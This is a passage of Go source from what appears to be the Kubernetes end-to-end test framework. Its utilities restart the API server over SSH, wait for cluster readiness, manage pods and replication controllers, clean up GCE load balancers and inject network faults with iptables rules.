if err != nil {
return err
}
return masterUpgradeGKE(v.GitVersion[1:]) // strip leading 'v'
}
func sshRestartMaster() error {
if !ProviderIs("gce", "aws") {
return fmt.Errorf("unsupported provider: %s", TestContext.Provider)
}
var command string
if ProviderIs("gce") {
// `kube-apiserver_kube-apiserver` matches the name of the apiserver
// container.
command = "sudo docker ps | grep kube-apiserver_kube-apiserver | cut -d ' ' -f 1 | xargs sudo docker kill"
} else {
command = "sudo /etc/init.d/kube-apiserver restart"
}
Logf("Restarting master via ssh, running: %v", command)
result, err := SSH(command, net.JoinHostPort(GetMasterHost(), sshPort), TestContext.Provider)
if err != nil || result.Code != 0 {
LogSSHResult(result)
return fmt.Errorf("couldn't restart apiserver: %v", err)
}
return nil
}
func WaitForApiserverUp(c clientset.Interface) error {
for start := time.Now(); time.Since(start) < time.Minute; time.Sleep(5 * time.Second) {
body, err := c.Core().RESTClient().Get().AbsPath("/healthz").Do().Raw()
if err == nil && string(body) == "ok" {
return nil
}
}
return fmt.Errorf("waiting for apiserver timed out")
}
// WaitForClusterSize waits until the cluster has desired size and there is no not-ready nodes in it.
// By cluster size we mean number of Nodes excluding Master Node.
func WaitForClusterSize(c clientset.Interface, size int, timeout time.Duration) error {
for start := time.Now(); time.Since(start) < timeout; time.Sleep(20 * time.Second) {
nodes, err := c.Core().Nodes().List(metav1.ListOptions{FieldSelector: fields.Set{
"spec.unschedulable": "false",
}.AsSelector().String()})
if err != nil {
Logf("Failed to list nodes: %v", err)
continue
}
numNodes := len(nodes.Items)
// Filter out not-ready nodes.
FilterNodes(nodes, func(node v1.Node) bool {
return IsNodeConditionSetAsExpected(&node, v1.NodeReady, true)
})
numReady := len(nodes.Items)
if numNodes == size && numReady == size {
Logf("Cluster has reached the desired size %d", size)
return nil
}
Logf("Waiting for cluster size %d, current size %d, not ready nodes %d", size, numNodes, numNodes-numReady)
}
return fmt.Errorf("timeout waiting %v for cluster size to be %d", timeout, size)
}
func GenerateMasterRegexp(prefix string) string {
return prefix + "(-...)?"
}
// waitForMasters waits until the cluster has the desired number of ready masters in it.
func WaitForMasters(masterPrefix string, c clientset.Interface, size int, timeout time.Duration) error {
for start := time.Now(); time.Since(start) < timeout; time.Sleep(20 * time.Second) {
nodes, err := c.Core().Nodes().List(metav1.ListOptions{})
if err != nil {
Logf("Failed to list nodes: %v", err)
continue
}
// Filter out nodes that are not master replicas
FilterNodes(nodes, func(node v1.Node) bool {
res, err := regexp.Match(GenerateMasterRegexp(masterPrefix), ([]byte)(node.Name))
if err != nil {
Logf("Failed to match regexp to node name: %v", err)
return false
}
return res
})
numNodes := len(nodes.Items)
// Filter out not-ready nodes.
FilterNodes(nodes, func(node v1.Node) bool {
return IsNodeConditionSetAsExpected(&node, v1.NodeReady, true)
})
numReady := len(nodes.Items)
if numNodes == size && numReady == size {
Logf("Cluster has reached the desired number of masters %d", size)
return nil
}
Logf("Waiting for the number of masters %d, current %d, not ready master nodes %d", size, numNodes, numNodes-numReady)
}
return fmt.Errorf("timeout waiting %v for the number of masters to be %d", timeout, size)
}
// GetHostExternalAddress gets the node for a pod and returns the first External
// address. Returns an error if the node the pod is on doesn't have an External
// address.
func GetHostExternalAddress(client clientset.Interface, p *v1.Pod) (externalAddress string, err error) {
node, err := client.Core().Nodes().Get(p.Spec.NodeName, metav1.GetOptions{})
if err != nil {
return "", err
}
for _, address := range node.Status.Addresses {
if address.Type == v1.NodeExternalIP {
if address.Address != "" {
externalAddress = address.Address
break
}
}
}
if externalAddress == "" {
err = fmt.Errorf("No external address for pod %v on node %v",
p.Name, p.Spec.NodeName)
}
return
}
type extractRT struct {
http.Header
}
func (rt *extractRT) RoundTrip(req *http.Request) (*http.Response, error) {
rt.Header = req.Header
return &http.Response{}, nil
}
// headersForConfig extracts any http client logic necessary for the provided
// config.
func headersForConfig(c *restclient.Config) (http.Header, error) {
extract := &extractRT{}
rt, err := restclient.HTTPWrappersForConfig(c, extract)
if err != nil {
return nil, err
}
if _, err := rt.RoundTrip(&http.Request{}); err != nil {
return nil, err
}
return extract.Header, nil
}
// OpenWebSocketForURL constructs a websocket connection to the provided URL, using the client
// config, with the specified protocols.
func OpenWebSocketForURL(url *url.URL, config *restclient.Config, protocols []string) (*websocket.Conn, error) {
tlsConfig, err := restclient.TLSConfigFor(config)
if err != nil {
return nil, fmt.Errorf("failed to create tls config: %v", err)
}
if tlsConfig != nil {
url.Scheme = "wss"
if !strings.Contains(url.Host, ":") {
url.Host += ":443"
}
} else {
url.Scheme = "ws"
if !strings.Contains(url.Host, ":") {
url.Host += ":80"
}
}
headers, err := headersForConfig(config)
if err != nil {
return nil, fmt.Errorf("failed to load http headers: %v", err)
}
cfg, err := websocket.NewConfig(url.String(), "http://localhost")
if err != nil {
return nil, fmt.Errorf("failed to create websocket config: %v", err)
}
cfg.Header = headers
cfg.TlsConfig = tlsConfig
cfg.Protocol = protocols
return websocket.DialConfig(cfg)
}
// getIngressAddress returns the ips/hostnames associated with the Ingress.
func getIngressAddress(client clientset.Interface, ns, name string) ([]string, error) {
ing, err := client.Extensions().Ingresses(ns).Get(name, metav1.GetOptions{})
if err != nil {
return nil, err
}
addresses := []string{}
for _, a := range ing.Status.LoadBalancer.Ingress {
if a.IP != "" {
addresses = append(addresses, a.IP)
}
if a.Hostname != "" {
addresses = append(addresses, a.Hostname)
}
}
return addresses, nil
}
// WaitForIngressAddress waits for the Ingress to acquire an address.
func WaitForIngressAddress(c clientset.Interface, ns, ingName string, timeout time.Duration) (string, error) {
var address string
err := wait.PollImmediate(10*time.Second, timeout, func() (bool, error) {
ipOrNameList, err := getIngressAddress(c, ns, ingName)
if err != nil || len(ipOrNameList) == 0 {
Logf("Waiting for Ingress %v to acquire IP, error %v", ingName, err)
return false, nil
}
address = ipOrNameList[0]
return true, nil
})
return address, err
}
// Looks for the given string in the log of a specific pod container
func LookForStringInLog(ns, podName, container, expectedString string, timeout time.Duration) (result string, err error) {
return LookForString(expectedString, timeout, func() string {
return RunKubectlOrDie("logs", podName, container, fmt.Sprintf("--namespace=%v", ns))
})
}
// Looks for the given string in a file in a specific pod container
func LookForStringInFile(ns, podName, container, file, expectedString string, timeout time.Duration) (result string, err error) {
return LookForString(expectedString, timeout, func() string {
return RunKubectlOrDie("exec", podName, "-c", container, fmt.Sprintf("--namespace=%v", ns), "--", "cat", file)
})
}
// Looks for the given string in the output of a command executed in a specific pod container
func LookForStringInPodExec(ns, podName string, command []string, expectedString string, timeout time.Duration) (result string, err error) {
return LookForString(expectedString, timeout, func() string {
// use the first container
args := []string{"exec", podName, fmt.Sprintf("--namespace=%v", ns), "--"}
args = append(args, command...)
return RunKubectlOrDie(args...)
})
}
// Looks for the given string in the output of fn, repeatedly calling fn until
// the timeout is reached or the string is found. Returns last log and possibly
// error if the string was not found.
func LookForString(expectedString string, timeout time.Duration, fn func() string) (result string, err error) {
for t := time.Now(); time.Since(t) < timeout; time.Sleep(Poll) {
result = fn()
if strings.Contains(result, expectedString) {
return
}
}
err = fmt.Errorf("Failed to find \"%s\", last result: \"%s\"", expectedString, result)
return
}
// getSvcNodePort returns the node port for the given service:port.
func getSvcNodePort(client clientset.Interface, ns, name string, svcPort int) (int, error) {
svc, err := client.Core().Services(ns).Get(name, metav1.GetOptions{})
if err != nil {
return 0, err
}
for _, p := range svc.Spec.Ports {
if p.Port == int32(svcPort) {
if p.NodePort != 0 {
return int(p.NodePort), nil
}
}
}
return 0, fmt.Errorf(
"No node port found for service %v, port %v", name, svcPort)
}
// GetNodePortURL returns the url to a nodeport Service.
func GetNodePortURL(client clientset.Interface, ns, name string, svcPort int) (string, error) {
nodePort, err := getSvcNodePort(client, ns, name, svcPort)
if err != nil {
return "", err
}
// This list of nodes must not include the master, which is marked
// unschedulable, since the master doesn't run kube-proxy. Without
// kube-proxy NodePorts won't work.
var nodes *v1.NodeList
if wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
nodes, err = client.Core().Nodes().List(metav1.ListOptions{FieldSelector: fields.Set{
"spec.unschedulable": "false",
}.AsSelector().String()})
return err == nil, nil
}) != nil {
return "", err
}
if len(nodes.Items) == 0 {
return "", fmt.Errorf("Unable to list nodes in cluster.")
}
for _, node := range nodes.Items {
for _, address := range node.Status.Addresses {
if address.Type == v1.NodeExternalIP {
if address.Address != "" {
return fmt.Sprintf("http://%v:%v", address.Address, nodePort), nil
}
}
}
}
return "", fmt.Errorf("Failed to find external address for service %v", name)
}
// ScaleRCByLabels scales an RC via ns/label lookup. If replicas == 0 it waits till
// none are running, otherwise it does what a synchronous scale operation would do.
func ScaleRCByLabels(clientset clientset.Interface, internalClientset internalclientset.Interface, ns string, l map[string]string, replicas uint) error {
listOpts := metav1.ListOptions{LabelSelector: labels.SelectorFromSet(labels.Set(l)).String()}
rcs, err := clientset.Core().ReplicationControllers(ns).List(listOpts)
if err != nil {
return err
}
if len(rcs.Items) == 0 {
return fmt.Errorf("RC with labels %v not found in ns %v", l, ns)
}
Logf("Scaling %v RCs with labels %v in ns %v to %v replicas.", len(rcs.Items), l, ns, replicas)
for _, labelRC := range rcs.Items {
name := labelRC.Name
if err := ScaleRC(clientset, internalClientset, ns, name, replicas, false); err != nil {
return err
}
rc, err := clientset.Core().ReplicationControllers(ns).Get(name, metav1.GetOptions{})
if err != nil {
return err
}
if replicas == 0 {
ps, err := podStoreForSelector(clientset, rc.Namespace, labels.SelectorFromSet(rc.Spec.Selector))
if err != nil {
return err
}
defer ps.Stop()
if err = waitForPodsGone(ps, 10*time.Second, 10*time.Minute); err != nil {
return fmt.Errorf("error while waiting for pods gone %s: %v", name, err)
}
} else {
if err := testutils.WaitForPodsWithLabelRunning(
clientset, ns, labels.SelectorFromSet(labels.Set(rc.Spec.Selector))); err != nil {
return err
}
}
}
return nil
}
// TODO(random-liu): Change this to be a member function of the framework.
func GetPodLogs(c clientset.Interface, namespace, podName, containerName string) (string, error) {
return getPodLogsInternal(c, namespace, podName, containerName, false)
}
func getPreviousPodLogs(c clientset.Interface, namespace, podName, containerName string) (string, error) {
return getPodLogsInternal(c, namespace, podName, containerName, true)
}
// utility function for gomega Eventually
func getPodLogsInternal(c clientset.Interface, namespace, podName, containerName string, previous bool) (string, error) {
logs, err := c.Core().RESTClient().Get().
Resource("pods").
Namespace(namespace).
Name(podName).SubResource("log").
Param("container", containerName).
Param("previous", strconv.FormatBool(previous)).
Do().
Raw()
if err != nil {
return "", err
}
if err == nil && strings.Contains(string(logs), "Internal Error") {
return "", fmt.Errorf("Fetched log contains \"Internal Error\": %q.", string(logs))
}
return string(logs), err
}
func GetGCECloud() (*gcecloud.GCECloud, error) {
gceCloud, ok := TestContext.CloudConfig.Provider.(*gcecloud.GCECloud)
if !ok {
return nil, fmt.Errorf("failed to convert CloudConfig.Provider to GCECloud: %#v", TestContext.CloudConfig.Provider)
}
return gceCloud, nil
}
// EnsureLoadBalancerResourcesDeleted ensures that cloud load balancer resources that were created
// are actually cleaned up. Currently only implemented for GCE/GKE.
func EnsureLoadBalancerResourcesDeleted(ip, portRange string) error {
if TestContext.Provider == "gce" || TestContext.Provider == "gke" {
return ensureGCELoadBalancerResourcesDeleted(ip, portRange)
}
return nil
}
func ensureGCELoadBalancerResourcesDeleted(ip, portRange string) error {
gceCloud, err := GetGCECloud()
if err != nil {
return err
}
project := TestContext.CloudConfig.ProjectID
region, err := gcecloud.GetGCERegion(TestContext.CloudConfig.Zone)
if err != nil {
return fmt.Errorf("could not get region for zone %q: %v", TestContext.CloudConfig.Zone, err)
}
return wait.Poll(10*time.Second, 5*time.Minute, func() (bool, error) {
service := gceCloud.GetComputeService()
list, err := service.ForwardingRules.List(project, region).Do()
if err != nil {
return false, err
}
for _, item := range list.Items {
if item.PortRange == portRange && item.IPAddress == ip {
Logf("found a load balancer: %v", item)
return false, nil
}
}
return true, nil
})
}
// The following helper functions can block/unblock network from source
// host to destination host by manipulating iptable rules.
// This function assumes it can ssh to the source host.
//
// Caution:
// Recommend to input IP instead of hostnames. Using hostnames will cause iptables to
// do a DNS lookup to resolve the name to an IP address, which will
// slow down the test and cause it to fail if DNS is absent or broken.
//
// Suggested usage pattern:
// func foo() {
// ...
// defer UnblockNetwork(from, to)
// BlockNetwork(from, to)
// ...
// }
//
func BlockNetwork(from string, to string) {
Logf("block network traffic from %s to %s", from, to)
iptablesRule := fmt.Sprintf("OUTPUT --destination %s --jump REJECT", to)
dropCmd := fmt.Sprintf("sudo iptables --insert %s", iptablesRule)
if result, err := SSH(dropCmd, from, TestContext.Provider); result.Code != 0 || err != nil {
LogSSHResult(result)
Failf("Unexpected error: %v", err)
}
}
func UnblockNetwork(from string, to string) {
Logf("Unblock network traffic from %s to %s", from, to)
iptablesRule := fmt.Sprintf("OUTPUT --destination %s --jump REJECT", to)
undropCmd := fmt.Sprintf("sudo iptables --delete %s", iptablesRule)
// Undrop command may fail if the rule has never been created.
// In such case we just lose 30 seconds, but the cluster is healthy.
// But if the rule had been created and removing it failed, the node is broken and
// not coming back. Subsequent tests will run or fewer nodes (some of the tests
// may fail). Manual intervention is required in such case (recreating the
// cluster solves the problem too).
err := wait.Poll(time.Millisecond*100, time.Second*30, func() (bool, error) {
result, err := SSH(undropCmd, from, TestContext.Provider)
if result.Code == 0 && err == nil {
return true, nil
}
LogSSHResult(result)
if err != nil {
Logf("Unexpected error: %v", err)
}
return false, nil
})
if err != nil {
Failf("Failed to remove the iptable REJECT rule. Manual intervention is "+
"required on host %s: remove rule %s, if exists", from, iptablesRule)
}
}
func isElementOf(podUID types.UID, pods *v1.PodList) bool {
for _, pod := range pods.Items {
if pod.UID == podUID {
return true
}
}
return false
}
func CheckRSHashLabel(rs *extensions.ReplicaSet) error {
if len(rs.Labels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 ||
len(rs.Spec.Selector.MatchLabels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 ||
len(rs.Spec.Template.Labels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 {
return fmt.Errorf("unexpected RS missing required pod-hash-template: %+v, selector = %+v, template = %+v", rs, rs.Spec.Selector, rs.Spec.Template)
}
return nil
}
func CheckPodHashLabel(pods *v1.PodList) error {
invalidPod := ""
for _, pod := range pods.Items {
if len(pod.Labels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 {
if len(invalidPod) == 0 {
invalidPod = "unexpected pods missing required pod-hash-template:"
}
invalidPod = fmt.Sprintf("%s %+v;", invalidPod, pod)
}
}
if len(invalidPod) > 0 {
return fmt.Errorf("%s", invalidPod)
}
return nil
}
// timeout for proxy requests.
const proxyTimeout = 2 * time.Minute
// NodeProxyRequest performs a get on a node proxy endpoint given the nodename and rest client.
func NodeProxyRequest(c clientset.Interface, node, endpoint string) (restclient.Result, error) {
// proxy tends to hang in some cases when Node is not ready. Add an artificial timeout for this call.
// This will leak a goroutine if proxy hangs. #22165
subResourceProxyAvailable, err := ServerVersionGTE(SubResourceServiceAndNodeProxyVersion, c.Discovery())
if err != nil {
return restclient.Result{}, err
}
var result restclient.Result
finished := make(chan struct{})
go func() {
if subResourceProxyAvailable {
result = c.Core().RESTClient().Get().
Resource("nodes").
SubResource("proxy").
Name(fmt.Sprintf("%v:%v", node, ports.KubeletPort)).
Suffix(endpoint).
Do()
} else {
result = c.Core().RESTClient().Get().
Prefix("proxy").
Resource("nodes").
Name(fmt.Sprintf("%v:%v", node, ports.KubeletPort)).
Suffix(endpoint).
Do()
}
finished <- struct{}{}
}()
select {
case <-finished:
return result, nil
case <-time.After(proxyTimeout):
return restclient.Result{}, nil
}
}
// GetKubeletPods retrieves the list of pods on the kubelet
func GetKubeletPods(c clientset.Interface, node string) (*v1.PodList, error) {
return getKubeletPods(c, node, "pods")
}
// GetKubeletRunningPods retrieves the list of running pods on the kubelet. The pods
// includes necessary information (e.g., UID, name, namespace for
// pods/containers), but do not contain the full spec.
func GetKubeletRunningPods(c clientset.Interface, node string) (*v1.PodList, error) {
return getKubeletPods(c, node, "runningpods")
}
func getKubeletPods(c clientset.Interface, node, resource string) (*v1.PodList, error) {
result := &v1.PodList{}
client, err := NodeProxyRequest(c, node, resource)
if err != nil {
return &v1.PodList{}, err
}
if err = client.Into(result); err != nil {
return &v1.PodList{}, err
}
return result, nil
}
// LaunchWebserverPod launches a pod serving http on port 8080 to act
// as the target for networking connectivity checks. The ip address
// of the created pod will be returned if the pod is launched
// successfully.
func LaunchWebserverPod(f *Framework, podName, nodeName string) (ip string) {
containerName := fmt.Sprintf("%s-container", podName)
port := 8080
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: podName,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: containerName,
Image: "gcr.io/google_containers/porter:4524579c0eb935c056c8e75563b4e1eda31587e0",
Env: []v1.EnvVar{{Name: fmt.Sprintf("SERVE_PORT_%d", port), Value: "foo"}},
Ports: []v1.ContainerPort{{ContainerPort: int32(port)}},
},
},
NodeName: nodeName,
RestartPolicy: v1.RestartPolicyNever,
},
}
podClient := f.ClientSet.Core().Pods(f.Namespace.Name)
_, err := podClient.Create(pod)
ExpectNoError(err)
ExpectNoError(f.WaitForPodRunning(podName))
createdPod, err := podClient.Get(podName, metav1.GetOptions{})
ExpectNoError(err)
ip = fmt.Sprintf("%s:%d", createdPod.Status.PodIP, port)
Logf("Target pod IP:port is %s", ip)
return
}
// CheckConnectivityToHost launches a pod to test connectivity to the specified
// host. An error will be returned if the host is not reachable from the pod.
//
// An empty nodeName will use the schedule to choose where the pod is executed.
func CheckConnectivityToHost(f *Framework, nodeName, podName, host string, timeout int) error {
contName := fmt.Sprintf("%s-container", podName)
command := []string{
"ping",
"-c", "3", // send 3 pings
"-W", "2", // wait at most 2 seconds for a reply
"-w", strconv.Itoa(timeout),
host,
}
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: podName,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: contName,
Image: "gcr.io/google_containers/busybox:1.24",
Command: command,
},
},
NodeName: nodeName,
RestartPolicy: v1.RestartPolicyNever,
},
}
podClient := f.ClientSet.Core().Pods(f.Namespace.Name)
_, err := podClient.Create(pod)
if err != nil {
return err
}
err = WaitForPodSuccessInNamespace(f.ClientSet, podName, f.Namespace.Name)
if err != nil {
logs, logErr := GetPodLogs(f.ClientSet, f.Namespace.Name, pod.Name, contName)
if logErr != nil {
Logf("Warning: Failed to get logs from pod %q: %v", pod.Name, logErr)
} else {
Logf("pod %s/%s logs:\n%s", f.Namespace.Name, pod.Name, logs)
}
}
return err
}
// CoreDump SSHs to the master and all nodes and dumps their logs into dir.
// It shells out to cluster/log-dump.sh to accomplish this.
func CoreDump(dir string) {
if TestContext.DisableLogDump {
Logf("Skipping dumping logs from cluster")
return
}
cmd := exec.Command(path.Join(TestContext.RepoRoot, "cluster", "log-dump.sh"), dir)
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
if err := cmd.Run(); err != nil {
Logf("Error running cluster/log-dump.sh: %v", err)
}
}
func UpdatePodWithRetries(client clientset.Interface, ns, name string, update func(*v1.Pod)) (*v1.Pod, error) {
for i := 0; i < 3; i++ {
pod, err := client.Core().Pods(ns).Get(name, metav1.GetOptions{})
if err != nil {
return nil, fmt.Errorf("Failed to get pod %q: %v", name, err)
}
update(pod)
pod, err = client.Core().Pods(ns).Update(pod)
if err == nil {
return pod, nil
}
if !apierrs.IsConflict(err) && !apierrs.IsServerTimeout(err) {
return nil, fmt.Errorf("Failed to update pod %q: %v", name, err)
}
}
return nil, fmt.Errorf("Too many retries updating Pod %q", name)
}
func GetPodsInNamespace(c clientset.Interface, ns string, ignoreLabels map[string]string) ([]*v1.Pod, error) {
pods, err := c.Core().Pods(ns).List(metav1.ListOptions{})
if err != nil {
return []*v1.Pod{}, err
}
ignoreSelector := labels.SelectorFromSet(ignoreLabels)
filtered := []*v1.Pod{}
for _, p := range pods.Items {
if len(ignoreLabels) != 0 && ignoreSelector.Matches(labels.Set(p.Labels)) {
continue
}
filtered = append(filtered, &p)
}
return filtered, nil
}
// RunCmd runs cmd using args and returns its stdout and stderr. It also outputs
// cmd's stdout and stderr to their respective OS streams.
func RunCmd(command string, args ...string) (string, string, error) {
return RunCmdEnv(nil, command, args...)
}
// RunCmdEnv runs cmd with the provided environment and args and
// returns its stdout and stderr. It also outputs cmd's stdout and
// stderr to their respective OS streams.
func RunCmdEnv(env []string, command string, args ...string) (string, string, error) {
Logf("Running %s %v", command, args)
var bout, berr bytes.Buffer
cmd := exec.Command(command, args...)
// We also output to the OS stdout/stderr to aid in debugging in case cmd
// hangs and never returns before the test gets killed.
//
// This creates some ugly output because gcloud doesn't always provide
// newlines.
cmd.Stdout = io.MultiWriter(os.Stdout, &bout)
cmd.Stderr = io.MultiWriter(os.Stderr, &berr)
cmd.Env = env
err := cmd.Run()
stdout, stderr := bout.String(), berr.String()
if err != nil {
return "", "", fmt.Errorf("error running %s %v; got error %v, stdout %q, stderr %q",
command, args, err, stdout, stderr)
}
return stdout, stderr, nil
}
// retryCmd runs cmd using args and retries it for up to SingleCallTimeout if
// it returns an error. It returns stdout and stderr.
func retryCmd(command string, args ...string) (string, string, error) {
var err error
stdout, stderr := "", ""
wait.Poll(Poll, SingleCallTimeout, func() (bool, error) {
stdout, stderr, err = RunCmd(command, args...)
if err != nil {
Logf("Got %v", err)
return false, nil
}
return true, nil
})
return stdout, stderr, err
}
// GetPodsScheduled returns a number of currently scheduled and not scheduled Pods.
func GetPodsScheduled(masterNodes sets.String, pods *v1.PodList) (scheduledPods, notScheduledPods []v1.Pod) {
for _, pod := range pods.Items {
if !masterNodes.Has(pod.Spec.NodeName) {
if pod.Spec.NodeName != "" {
_, scheduledCondition := podutil.GetPodCondition(&pod.Status, v1.PodScheduled)
Expect(scheduledCondition != nil).To(Equal(true))
Expect(scheduledCondition.Status).To(Equal(v1.ConditionTrue))
scheduledPods = append(scheduledPods, pod)
} else {
_, scheduledCondition := podutil.GetPodCondition(&pod.Status, v1.PodScheduled)
Expect(scheduledCondition != nil).To(Equal(true))
Expect(scheduledCondition.Status).To(Equal(v1.ConditionFalse))
if scheduledCondition.Reason == "Unschedulable" {
notScheduledPods = append(notScheduledPods, pod)
}
}
}
}
return
}
// WaitForStableCluster waits until all existing pods are scheduled and returns their amount.
func WaitForStableCluster(c clientset.Interface, masterNodes sets.String) int {
timeout := 10 * time.Minute
startTime := time.Now()
allPods, err := c.Core().Pods(metav1.NamespaceAll).List(metav1.ListOptions{})
ExpectNoError(err)
// API server returns also Pods that succeeded. We need to filter them out.
currentPods := make([]v1.Pod, 0, len(allPods.Items))
for _, pod := range allPods.Items {
if pod.Status.Phase != v1.PodSucceeded && pod.Status.Phase != v1.PodFailed {
currentPods = append(currentPods, pod)
}
}
allPods.Items = currentPods
scheduledPods, currentlyNotScheduledPods := GetPodsScheduled(masterNodes, allPods)
for len(currentlyNotScheduledPods) != 0 {
time.Sleep(2 * time.Second)
allPods, err := c.Core().Pods(metav1.NamespaceAll).List(metav1.ListOptions{})
ExpectNoError(err)
scheduledPods, currentlyNotScheduledPods = GetPodsScheduled(masterNodes, allPods)
if startTime.Add(timeout).Before(time.Now()) {
Failf("Timed out after %v waiting for stable cluster.", timeout)
break
}
}
return len(scheduledPods)
}
// GetMasterAndWorkerNodesOrDie will return a list masters and schedulable worker nodes
func GetMasterAndWorkerNodesOrDie(c clientset.Interface) (sets.String, *v1.NodeList) {
nodes := &v1.NodeList{}
masters := sets.NewString()
all, _ := c.Core().Nodes().List(metav1.ListOptions{})
for _, n := range all.Items {
if system.IsMasterNode(n.Name) {
masters.Insert(n.Name)
} else if isNodeSchedulable(&n) && isNodeUntainted(&n) {
nodes.Items = append(nodes.Items, n)
}
}
return masters, nodes
}
func ListNamespaceEvents(c clientset.Interface, ns string) error {
ls, err := c.Core().Events(ns).List(metav1.ListOptions{})
if err != nil {
return err
}
for _, event := range ls.Items {
glog.Infof("Event(%#v): type: '%v' reason: '%v' %v", event.InvolvedObject, event.Type, event.Reason, event.Message)
}
return nil
}
// E2ETestNodePreparer implements testutils.TestNodePreparer interface, which is used
// to create/modify Nodes before running a test.
type E2ETestNodePreparer struct {
client clientset.Interface
// Specifies how many nodes should be modified using the given strategy.
// Only one strategy can be applied to a single Node, so there needs to
// be at least <sum_of_keys> Nodes in the cluster.
countToStrategy []testutils.CountToStrategy
nodeToAppliedStrategy map[string]testutils.PrepareNodeStrategy
}
func NewE2ETestNodePreparer(client clientset.Interface, countToStrategy []testutils.CountToStrategy) testutils.TestNodePreparer {
return &E2ETestNodePreparer{
client: client,
countToStrategy: countToStrategy,
nodeToAppliedStrategy: make(map[string]testutils.PrepareNodeStrategy),
}
}
func (p *E2ETestNodePreparer) PrepareNodes() error {
nodes := GetReadySchedulableNodesOrDie(p.client)
numTemplates := 0
for k := range p.countToStrategy {
numTemplates += k
}
if numTemplates > len(nodes.Items) {
return fmt.Errorf("Can't prepare Nodes. Got more templates than existing Nodes.")
}
index := 0
sum := 0
for _, v := range p.countToStrategy {
sum += v.Count
for ; index < sum; index++ {
if err := testutils.DoPrepareNode(p.client, &nodes.Items[index], v.Strategy); err != nil {
glog.Errorf("Aborting node preparation: %v", err)
return err
}
p.nodeToAppliedStrategy[nodes.Items[index].Name] = v.Strategy
}
}
return nil
}
func (p *E2ETestNodePreparer) CleanupNodes() error {
var encounteredError error
nodes := GetReadySchedulableNodesOrDie(p.client)
for i := range nodes.Items {
var err error
name := nodes.Items[i].Name
strategy, found := p.nodeToAppliedStrategy[name]
if found {
if err = testutils.DoCleanupNode(p.client, name, strategy); err != nil {
glog.Errorf("Skipping cleanup of Node: failed update of %v: %v", name, err)
encounteredError = err
}
}
}
return encounteredError
}
// CleanupGCEResources cleans up GCE Service Type=LoadBalancer resources with
// the given name. The name is usually the UUID of the Service prefixed with an
// alpha-numeric character ('a') to work around cloudprovider rules.
func CleanupGCEResources(loadBalancerName string) (retErr error) {
gceCloud, err := GetGCECloud()
if err != nil {
return err
}
if err := gceCloud.DeleteFirewall(loadBalancerName); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = err
}
if err := gceCloud.DeleteForwardingRule(loadBalancerName); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, err)
}
if err := gceCloud.DeleteGlobalStaticIP(loadBalancerName); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, err)
}
// This function shells out to gcloud, so we can't compare for NotFound errors.
// TODO: Invoke cloudprovider method directly instead.
if err := DeleteGCEStaticIP(loadBalancerName); err != nil {
Logf("%v", err)
}
hc, getErr := gceCloud.GetHttpHealthCheck(loadBalancerName)
if getErr != nil && !IsGoogleAPIHTTPErrorCode(getErr, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, getErr)
return
}
if err := gceCloud.DeleteTargetPool(loadBalancerName, hc); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, err)
}
return
}
// IsHTTPErrorCode returns true if the error is a google api
// error matching the corresponding HTTP error code.
func IsGoogleAPIHTTPErrorCode(err error, code int) bool {
apiErr, ok := err.(*googleapi.Error)
return ok && apiErr.Code == code
}
// getMaster populates the externalIP, internalIP and hostname fields of the master.
// If any of these is unavailable, it is set to "".
func getMaster(c clientset.Interface) Address {
master := Address{}
// Populate the internal IP.
eps, err := c.Core().Endpoints(metav1.NamespaceDefault).Get("kubernetes", metav1.GetOptions{})
if err != nil {
Failf("Failed to get kubernetes endpoints: %v", err)
}
if len(eps.Subsets) != 1 || len(eps.Subsets[0].Addresses) != 1 {
Failf("There are more than 1 endpoints for kubernetes service: %+v", eps)
}
master.internalIP = eps.Subsets[0].Addresses[0].IP
// Populate the external IP/hostname.
url, err := url.Parse(TestContext.Host)
if err != nil {
Failf("Failed to parse hostname: %v", err)
}
if net.ParseIP(url.Host) != nil {
// TODO: Check that it is external IP (not having a reserved IP address as per RFC1918).
master.externalIP = url.Host
} else {
master.hostname = url.Host
}
return master
}
// GetMasterAddress returns the hostname/external IP/internal IP as appropriate for e2e tests on a particular provider
// which is the address of the interface used for communication with the kubelet.
func GetMasterAddress(c clientset.Interface) string {
master := getMaster(c)
switch TestContext.Provider {
case "gce", "gke":
return master.externalIP
case "aws":
return awsMasterIP
default:
Failf("This test is not supported for provider %s and should be disabled", TestContext.Provider)
}
return ""
}
// GetNodeExternalIP returns node external IP concatenated with port 22 for ssh
// e.g. 1.2.3.4:22
func GetNodeExternalIP(node *v1.Node) string {
Logf("Getting external IP address for %s", node.Name)
host := ""
for _, a := range node.Status.Addresses {
if a.Type == v1.NodeExternalIP {
host = net.JoinHostPort(a.Address, sshPort)
break
}
}
if host == "" {
Failf("Couldn't get the external IP of host %s with addresses %v", node.Name, node.Status.Addresses)
}
return host
}
// RcByNamePort returns a ReplicationController with specified name and port
func RcByNamePort(name string, replicas int32, image string, port int, protocol v1.Protocol,
labels map[string]string, gracePeriod *int64) *v1.ReplicationController {
return RcByNameContainer(name, replicas, image, labels, v1.Container{
Name: name,
Image: image,
Ports: []v1.ContainerPort{{ContainerPort: int32(port), Protocol: protocol}},
}, gracePeriod)
}
// RcByNameContainer returns a ReplicationControoler with specified name and container
func RcByNameContainer(name string, replicas int32, image string, labels map[string]string, c v1.Container,
gracePeriod *int64) *v1.ReplicationController {
zeroGracePeriod := int64(0)
// Add "name": name to the labels, overwriting if it exists.
labels["name"] = name
if gracePeriod == nil {
gracePeriod = &zeroGracePeriod
}
return &v1.ReplicationController{
TypeMeta: metav1.TypeMeta{
